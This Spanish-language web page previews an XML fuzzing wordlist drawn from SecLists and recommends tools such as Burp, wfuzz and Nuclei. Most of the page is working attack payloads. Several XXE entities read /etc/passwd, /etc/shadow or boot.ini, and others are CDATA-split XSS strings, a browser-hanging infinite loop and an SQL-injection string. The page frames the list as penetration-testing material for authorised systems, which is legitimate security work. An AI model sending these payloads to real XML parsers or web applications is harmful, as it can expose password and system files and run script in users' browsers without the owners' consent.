XML / XXE Fuzzing Payloads
Payloads de fuzzing XML que incluyen XSS en CDATA, divulgación de archivos mediante entidad SYSTEM (XXE) y vectores de inyección de DOCTYPE para probar analizadores XML.
- Tamaño
- 1.9 KB
- Categoría
- Fuzzing
- Fuente
- danielmiessler/SecLists
- Licencia
- MIT
- Herramientas recomendadas
- burpwfuzznuclei
Vista previa
Las primeras 15 entradas. Descarga o copia la lista completa (1.9 KB) con los botones de arriba.
## After XML Declaration
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xee SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xee SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xee SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xee SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
]>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
]>
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xee SYSTEM "file:///dev/random">]><foo>&xee;</foo>Payloads de fuzzing XML que incluyen XSS en CDATA, divulgación de archivos mediante entidad SYSTEM (XXE) y vectores de inyección de DOCTYPE para probar analizadores XML.
Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 1.9 KB y combina bien con herramientas como burp, wfuzz, nuclei. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y más silenciosas para ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo sin conexión, donde la velocidad es una restricción menor.
Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a
tu portapapeles o descargar el archivo .txt en bruto. La lista completa se sirve directamente
desde su fuente original en GitHub.
Obtenido de danielmiessler/SecLists y distribuido bajo MIT. Usa las listas de palabras únicamente contra sistemas para los que tengas autorización explícita de realizar pruebas.